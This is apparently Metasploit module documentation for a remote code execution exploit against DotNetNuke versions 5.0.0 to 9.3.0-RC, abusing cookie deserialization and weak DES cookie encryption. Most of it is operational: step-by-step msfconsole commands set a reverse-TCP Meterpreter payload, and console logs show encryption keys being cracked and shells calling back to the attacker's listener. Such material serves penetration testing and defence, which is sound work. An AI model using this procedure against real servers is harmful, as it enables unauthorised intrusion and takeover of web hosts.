This module exploits a deserialization vulnerability in DotNetNuke (DNN) versions 5.0.0 to 9.3.0-RC. Vulnerable versions store profile information for users in the DNNPersonalization cookie as XML.

The expected structure includes a "type" attribute to instruct the server which type of object to create on deserialization. The cookie is processed by the application whenever it attempts to load the current user's profile data, which occurs when DNN is configured to handle 404 errors with its built-in error page (default configuration). An attacker can leverage this vulnerability to execute arbitrary code on the system.

### DNN v5.0.0 - v9.1.0

  **CVE-2017-9822**:
  
  Directly exploitable.


### DNN v9.1.1 - v9.2.1

  **CVE-2018-15811**, **CVE-2018-15812**:
  
  The patch for CVE-2017-9822 used a weak encryption algorithm (DES) and an encryption key of low entropy. Furthermore, if the target site is configured to use Verified Registration, the plaintext value of the registration verification code is exposed on the user profile page. Since the verification code is encrypted using the same algorithm and key as the DNNPersonalization cookie, a known-plaintext attack can be used to recover the key and re-exploit CVE-2017-9822 with an encrypted cookie. In some cases a valid .DOTNETNUKE session token may be required for exploitation (v9.2.0+)


### DNN v9.2.2 - v9.3.0-RC

  **CVE-2018-18325**, **CVE-2018-18326**:
  
  The implemented patch for CVE-2018-15811 and CVE-2018-15812 did not prevent exploitation. The patch changed the encryption key used to encrypt and decrypt the DNNPersonalization cookie; however, this encryption key was still derived from the key used to encrypt and decrypt the registration verification code and the strength of the encryption algorithm was not increased (DES). Additional changes were made to prevent the full plaintext of the verification code from being disclosed. A partial plaintext value was still disclosed on the user profile page. Due to the project being open-source, it was possible to determine the format of the rest of the plaintext verification code. Using a list of obtained verification codes and the known partial plaintext value, it is possible to reduce the number of potential encryption keys through offline processing to a point where trying to re-exploit CVE-2017-9822 with each potential key becomes a feasible attack.


## Vulnerable Application

  On a Windows machine, download the "Install" package from here:
  
  [https://github.com/dnnsoftware/Dnn.Platform/releases/tag/v9.3.0-rc2](https://github.com/dnnsoftware/Dnn.Platform/releases/tag/v9.3.0-rc2)
  
  Install packages for other versions can be downloaded from:
  
  `https://github.com/dnnsoftware/Dnn.Platform/releases/tag/<version number>`
  
  Follow the installation instructions here for installing with ATTACHED DATABASE:
  
  [https://www.dnnsoftware.com/wiki/how-to-install-dotnetnuke](https://www.dnnsoftware.com/wiki/how-to-install-dotnetnuke)
  
  You will need SQL Server 2005/2008/2008R2/2012 or 2016 installed.
  
  Log in as the super user account and make sure the 404 error page is set to the built-in 404 Error Page.
  Typically, this is already set as the default setting, but during testing I encountered an edge case where an issue during installation caused this value to be set to "None Specified".
  
  Additionally, if you are testing this module from a machine other than the host that the application is installed on, you will need to configure the Site Alias so that it is accessible using a hostname other than `localhost`. Additional firewall rules may need to be configured to allow web access, depending on how you set up the applicaiton in IIS.
  
  This module has been tested on DNN v7.0.0 - v9.3.0-RC running on Windows Server 2016.

  
### v5.0.0 - v9.1.0
  No additional configuration required.
  
### v9.1.1+
  While logged in as the super user account, configure the application to use Verified registration. You will also need to configure the SMTP server settings to be valid in order to receive the registration email.

## Verification Steps  

### v5.0.0 - v9.1.0
  1. Install the application
  2. Start msfconsole
  3. Do: ```use exploit/windows/http/dnn_cookie_deserialization_rce```
  4. Do: ```set RHOST <RHOST>```
  5. Do: ```set RPORT <RPORT>```
  6. Do: ```set PAYLOAD windows/meterpreter/reverse_tcp```
  7. Do: ```set LHOST <LHOST>```
  8. Do: ```set LPORT <LPORT>```
  9. Do: ```check```
  10. **Verify** that you are seeing `The target appears to be vulnerable` in the console
  11. Do: ```exploit```
  12. **Verify** that you get a Meterpreter shell
  
### v9.1.1
  1. Install the application
  2. Configure the application to use Verified Registration
  3. Configure the application's SMTP server settings so that it will send the registration email
  4. Register a new user account and copy the verification code in the link in the registration email
  5. Log in as the new user and navigate to the Edit Profile page. Note the `userId` url path parameter value
  6. Examine the page's source code and search for a `portalId` value that is a positive integer.
  7. Start msfconsole
  8. Do: ```use exploit/windows/http/dnn_cookie_deserialization_rce```
  9. Do: ```set RHOST <RHOST>```
  10. Do: ```set RPORT <RPORT>```
  11. Do: ```set PAYLOAD windows/meterpreter/reverse_tcp```
  12. Do: ```set LHOST <LHOST>```
  13. Do: ```set LPORT <LPORT>```
  14. Do: ```set VERIFICATION_CODE <Verification Code>```
  15. Do: ```set VERIFICATION_PLAIN <{portalId}-{userId}>```
  16. Do: ```set ENCRYPTED true```
  14. Do: ```check```
  15. **Verify** that you are seeing `The target appears to be vulnerable` in the console
  16. Do: ```exploit```
  17. **Verify** that you get a Meterpreter shell
  
### v9.2.0 - v9.2.1
  1. Install the application
  2. Configure the application to use Verified Registration
  3. Configure the application's SMTP server settings so that it will send the registration email
  4. Register a new user account and copy the verification code in the link in the registration email
  5. Log in as the new user and navigate to the Edit Profile page. Note the `userId` url path parameter value
  6. Examine the Edit Profile page's source code and search for a `portalId` value that is a positive integer.
  7. While logged in, examine your cookies using the browser's developer tools or by other means. Copy the value of the `.DOTNETNUKE` cookie value.
  8. Start msfconsole
  9. Do: ```use exploit/windows/http/dnn_cookie_deserialization_rce```
  10. Do: ```set RHOST <RHOST>```
  11. Do: ```set RPORT <RPORT>```
  12. Do: ```set PAYLOAD windows/meterpreter/reverse_tcp```
  13. Do: ```set LHOST <LHOST>```
  14. Do: ```set LPORT <LPORT>```
  15. Do: ```set VERIFICATION_CODE <Verification Code>```
  16. Do: ```set VERIFICATION_PLAIN <{portalId}-{userId}>```
  17. Do: ```set ENCRYPTED true```
  18. Do: ```set SESSION_TOKEN <.DOTNETNUKE cookie value>```
  19. Do: ```check```
  20. **Verify** that you are seeing `The target appears to be vulnerable` in the console
  21. Do: ```exploit```
  22. **Verify** that you get a Meterpreter shell
  
### v9.2.2 - 9.3.0-RC
  In these versions, the `userId` value was changed to be a randomly generated GUID. This means that only the first part of the verification plaintext is known. By providing a list of several verification codes, it is possible to reduce the nubmer of potential encryption key values to a feasible amount. Once the list of encryption keys has been reduced, the module will test each key until an HTTP callback is received on port `8080` that indicates which key worked. Then, the final exploit payload will be encrypted using the recovered key and sent to the server, resulting in a shell.
  
  1. Install the application
  2. Configure the application to use Verified Registration
  3. Configure the application's SMTP server settings so that it will send the registration email
  4. Register several new user accounts and note the verification codes in the link in the registration emails
  5. Log in as the new user and navigate to the Edit Profile page.
  6. Examine the Edit Profile page's source code and search for a `portalId` value that is a positive integer
  7. While logged in, examine your cookies using the browser's developer tools or by other means. Copy the value of the `.DOTNETNUKE` cookie value.
  8. Start msfconsole
  9. Do: ```use exploit/windows/http/dnn_cookie_deserialization_rce```
  10. Do: ```set RHOST <RHOST>```
  11. Do: ```set RPORT <RPORT>```
  12. Do: ```set PAYLOAD windows/meterpreter/reverse_tcp```
  13. Do: ```set LHOST <LHOST>```
  14. Do: ```set LPORT <LPORT>```
  15. Do: ```set VERIFICATION_CODE <full path to file containing verification codes>```
  16. Do: ```set VERIFICATION_PLAIN <{portalId}->```
  17. Do: ```set ENCRYPTED true```
  18. Do: ```set SESSION_TOKEN <.DOTNETNUKE cookie value>```
  19. Do: ```set TARGET 4```
  20. Do: ```check```
  21. **Verify** that you are seeing `The target appears to be vulnerable` in the console.
  22. Do: ```exploit```
  23. **Verify** that you get a Meterpreter shell 

## Options
 
  **DryRun**
  
  Set this to `true` to generate a payload, but not send the exploit to the target server. Default value is `false`.
  
  **ENCRYPTED**
  
  Set this to `true` for targets running v9.1.1+. Default value is `false`.
  
  **IV**
  
  The initialization vector to use for encrypting the payload. If specified along with `KEY`, `VERIFICATION_CODE` and `VERIFICATION_PLAIN` options will be ignored.
  
  **KEY**
  
  The key to use for encryption. If specified along with `IV`, `VERIFICATION_CODE` and `VERIFICATION_PLAIN` options will be ignored.
  
  **SESSION_TOKEN**
  
  The .DOTNETNUKE session cookie value to use when submitting the payload to the server. Required for targets running v9.2.0+.
  
  **SRVPORT**
  
  The server port to listen for HTTP callbacks on when testing encryption passphrases for targets running v9.2.2 - v9.3.0-RC. Default value is `8080`
  
  **TARGETURI**
  
  Path to a page that will result in a DNN 404 Error Page. The default location is `/__`
  
  **VERIFICATION_CODE**
  
  The verification code received in an email, or the full path to a file containing multiple verification codes.
  
  **VERIFICATION_PLAIN**
  
  The known (full or partial) plaintext of the encrypted verification code. Typically in the format of {portalID}-{userID} where portalID is an integer and userID is either an integer (v9.1.1 - v9.2.1) or GUID (v9.2.2+). 
  
  

## Scenarios
### v5.1.0 - v9.1.0
  Here's showing the expected output:
  
  ```
  msf5 > use exploit/windows/http/dnn_cookie_deserialization_rce 
  msf5 exploit(windows/http/dnn_cookie_deserialization_rce) > set RHOSTS 192.168.31.131
  msf5 exploit(windows/http/dnn_cookie_deserialization_rce) > set RPORT 8083
  msf5 exploit(windows/http/dnn_cookie_deserialization_rce) > set PAYLOAD windows/meterpreter/reverse_tcp
  msf5 exploit(windows/http/dnn_cookie_deserialization_rce) > set LHOST 192.168.31.128
  msf5 exploit(windows/http/dnn_cookie_deserialization_rce) > set LPORT 443
  msf5 exploit(windows/http/dnn_cookie_deserialization_rce) > check

  [*] Trying to determine DNN Version...
  [*] Checking version at /Documentation/License.txt ...
  [+] DNN Version Found: v5.1.0 - v9.0.1
  [*] Checking for custom error page at: /__ ...
  [+] Custom error page detected.
  [*] 192.168.31.131:8083 - The target appears to be vulnerable.
  msf5 exploit(windows/http/dnn_cookie_deserialization_rce) > exploit

  [*] Checking for custom error page at: /__ ...
  [+] Custom error page detected.
  [*] Started reverse TCP handler on 192.168.31.128:443 
  [*] Sending Exploit Payload to: /__ ...
  [*] Sending stage (179779 bytes) to 192.168.31.131
  [*] Meterpreter session 1 opened (192.168.31.128:443 -> 192.168.31.131:49957) at 2019-07-10 14:02:09 -0400

  meterpreter > sysinfo
  Computer        : SERVER_NAME
  OS              : Windows 2016 (Build 14393).
  Architecture    : x64
  System Language : en_US
  Domain          : WORKGROUP
  Logged On Users : 2
  Meterpreter     : x86/windows
  meterpreter >
  ```
### v9.1.1
  Here's showing the expected output
  
  ```
  msf5 > use exploit/windows/http/dnn_cookie_deserialization_rce 
  msf5 exploit(windows/http/dnn_cookie_deserialization_rce) > set RHOSTS 192.168.31.131
  msf5 exploit(windows/http/dnn_cookie_deserialization_rce) > set RPORT 8084
  msf5 exploit(windows/http/dnn_cookie_deserialization_rce) > set PAYLOAD windows/meterpreter/reverse_tcp
  msf5 exploit(windows/http/dnn_cookie_deserialization_rce) > set LHOST 192.168.31.128
  msf5 exploit(windows/http/dnn_cookie_deserialization_rce) > set LPORT 443
  msf5 exploit(windows/http/dnn_cookie_deserialization_rce) > set VERIFICATION_CODE Amop-0Et1fM_
  msf5 exploit(windows/http/dnn_cookie_deserialization_rce) > set VERIFICATION_PLAIN 0-2
  msf5 exploit(windows/http/dnn_cookie_deserialization_rce) > set ENCRYPTED true
  msf5 exploit(windows/http/dnn_cookie_deserialization_rce) > check

  [*] Trying to determine DNN Version...
  [*] Checking version at /Documentation/License.txt ...
  [!] DNN Version Found: v9.0.1 - v9.1.1 - May require ENCRYPTED
  [*] Checking for custom error page at: /__ ...
  [+] Custom error page detected.
  [*] 192.168.31.131:8084 - The target appears to be vulnerable.
  msf5 exploit(windows/http/dnn_cookie_deserialization_rce) > exploit

  [*] Checking for custom error page at: /__ ...
  [+] Custom error page detected.
  [*] Finding Key...
  [*] Searching at 648742.110 keys/s ...... 68.69% of keyspace complete.
  [+] KEY Found: B2ABB4BB
  [+] IV Found: 11A4D8BE
  [*] Total number of Keys tried: 29568463
  [*] Time to crack: 45.578 seconds
  [*] Started reverse TCP handler on 192.168.31.128:443 
  [*] Sending Exploit Payload to: /__ ...
  [*] Sending stage (179779 bytes) to 192.168.31.131
  [*] Meterpreter session 1 opened (192.168.31.128:443 -> 192.168.31.131:49970) at 2019-07-10 14:46:38 -0400

  meterpreter > sysinfo
  Computer        : SERVER_NAME
  OS              : Windows 2016 (Build 14393).
  Architecture    : x64
  System Language : en_US
  Domain          : WORKGROUP
  Logged On Users : 2
  Meterpreter     : x86/windows
  meterpreter >
  ``` 
### v9.2.0 - v9.2.1
  Here's the expected output:
  
  ```
  msf5 > use exploit/windows/http/dnn_cookie_deserialization_rce 
  msf5 exploit(windows/http/dnn_cookie_deserialization_rce) > set RHOSTS 192.168.31.131
  msf5 exploit(windows/http/dnn_cookie_deserialization_rce) > set RPORT 8085
  msf5 exploit(windows/http/dnn_cookie_deserialization_rce) > set PAYLOAD windows/meterpreter/reverse_tcp
  msf5 exploit(windows/http/dnn_cookie_deserialization_rce) > set LHOST 192.168.31.128
  msf5 exploit(windows/http/dnn_cookie_deserialization_rce) > set LPORT 443
  msf5 exploit(windows/http/dnn_cookie_deserialization_rce) > set VERIFICATION_CODE xR9oL8FP2eE_
  msf5 exploit(windows/http/dnn_cookie_deserialization_rce) > set VERIFICATION_PLAIN 0-3
  msf5 exploit(windows/http/dnn_cookie_deserialization_rce) > set ENCRYPTED true
  msf5 exploit(windows/http/dnn_cookie_deserialization_rce) > set SESSION_TOKEN 20FED393A44F86138D9089074C819880222A494155CEFAC6FEAF2B3B5204A227625654D87EA48ECB1E509664A7E8E32644BD363D3E6FD3A3273B245EF2D10B5E13D7912B
  msf5 exploit(windows/http/dnn_cookie_deserialization_rce) > check

  [*] Trying to determine DNN Version...
  [*] Checking version at /Documentation/License.txt ...
  [!] DNN Version Found: v9.2.0+ - Requires ENCRYPTED and SESSION_TOKEN. Setting target to 3 (v9.2.0 - v9.2.1). Site may also be 9.2.2 - try setting target 4 and supply a file of of verification codes, or specifiy valid Key and IV values.
  [*] Checking for custom error page at: /__ ...
  [+] Custom error page detected.
  [+] 192.168.31.131:8085 - The target appears to be vulnerable.
  msf5 exploit(windows/http/dnn_cookie_deserialization_rce) > exploit

  [*] Checking for custom error page at: /__ ...
  [+] Custom error page detected.
  [*] Finding Key...
  [*] Searching at 641992.579 keys/s ...... 1.47% of keyspace complete.
  [+] KEY Found: 022BA242
  [+] IV Found: 0BCF9976
  [*] Total number of Keys tried: 633602
  [*] Time to crack: 0.987 seconds
  [*] Started reverse TCP handler on 192.168.31.128:443 
  [*] Sending Exploit Payload to: /__ ...
  [*] Sending stage (179779 bytes) to 192.168.31.131
  [*] Meterpreter session 1 opened (192.168.31.128:443 -> 192.168.31.131:49971) at 2019-07-10 15:08:04 -0400

  meterpreter > sysinfo
  Computer        : SERVER_NAME
  OS              : Windows 2016 (Build 14393).
  Architecture    : x64
  System Language : en_US
  Domain          : WORKGROUP
  Logged On Users : 2
  Meterpreter     : x86/windows
  meterpreter >
  ```
### v9.2.2 - v9.3.0-RC
  Here's the expected output:

  ```
  msf5 > use exploit/windows/http/dnn_cookie_deserialization_rce 
  msf5 exploit(windows/http/dnn_cookie_deserialization_rce) > set RHOSTS 192.168.31.131
  msf5 exploit(windows/http/dnn_cookie_deserialization_rce) > set RPORT 8090
  msf5 exploit(windows/http/dnn_cookie_deserialization_rce) > set PAYLOAD windows/meterpreter/reverse_tcp
  msf5 exploit(windows/http/dnn_cookie_deserialization_rce) > set LHOST 192.168.31.128
  msf5 exploit(windows/http/dnn_cookie_deserialization_rce) > set LPORT 443
  msf5 exploit(windows/http/dnn_cookie_deserialization_rce) > set VERIFICATION_CODE /dnn930rc_verification_codes.txt
  msf5 exploit(windows/http/dnn_cookie_deserialization_rce) > set VERIFICATION_PLAIN 0-
  msf5 exploit(windows/http/dnn_cookie_deserialization_rce) > set ENCRYPTED true
  msf5 exploit(windows/http/dnn_cookie_deserialization_rce) > set SESSION_TOKEN 306A9A382E32E420739C589CCD5C44A7C2595A7163D3340DF4AD71D4223AFC6866E823F36C6171F84FD7352E6BEB17D66B9823567557988321A0867C7038FF6B0F5B0C1F943CBBDAC0B2EE3E
  msf5 exploit(windows/http/dnn_cookie_deserialization_rce) > set TARGET 4
  msf5 exploit(windows/http/dnn_cookie_deserialization_rce) > check

  [*] Checking for custom error page at: /__ ...
  [+] Custom error page detected.
  [+] 192.168.31.131:8090 - The target is vulnerable.
  msf5 exploit(windows/http/dnn_cookie_deserialization_rce) > exploit

  [*] Checking for custom error page at: /__ ...
  [+] Custom error page detected.
  [*] Finding Key...
  [*] Searching at 420798.449 keys/s ...... 15.24% of keyspace complete.
  [+] Possible Base Key Value Found: 2660A22D
  [*] Total number of Keys tried: 6558182
  [*] Time to crack: 15.585 seconds
  [*] Generated 128 possible base KEY values from 2660A22D
  [!] Finding possible base IVs. This may take a few minutes...
  [*] Found 4 potential Base IV values using 10 verification codes in 42.82 seconds.
  [*] Generated 512 possible base64 KEY and IV combinations.
  [!] Trying all possible KEY and IV combinations...
  [*] Starting HTTP listener on port 8080...
  [*] Using URL: http://192.168.31.128:8080/fCyQGz78
  [!] Sending 512 test Payload(s) to: /__. This may take a few minutes ...
  [*] Trying KEY and IV combination 440 of 512...
  [+] KEY: ByEypXIT and IV: zhKad5QC found
  [*] Started reverse TCP handler on 192.168.31.128:443 
  [*] Sending Exploit Payload to: /__ ...
  [*] Sending stage (179779 bytes) to 192.168.31.131
  [*] Meterpreter session 1 opened (192.168.31.128:443 -> 192.168.31.131:49973) at 2019-07-10 15:39:12 -0400

  meterpreter > sysinfo
  Computer        : SERVER_NAME
  OS              : Windows 2016 (Build 14393).
  Architecture    : x64
  System Language : en_US
  Domain          : WORKGROUP
  Logged On Users : 2
  Meterpreter     : x86/windows
  meterpreter >
  ``` 

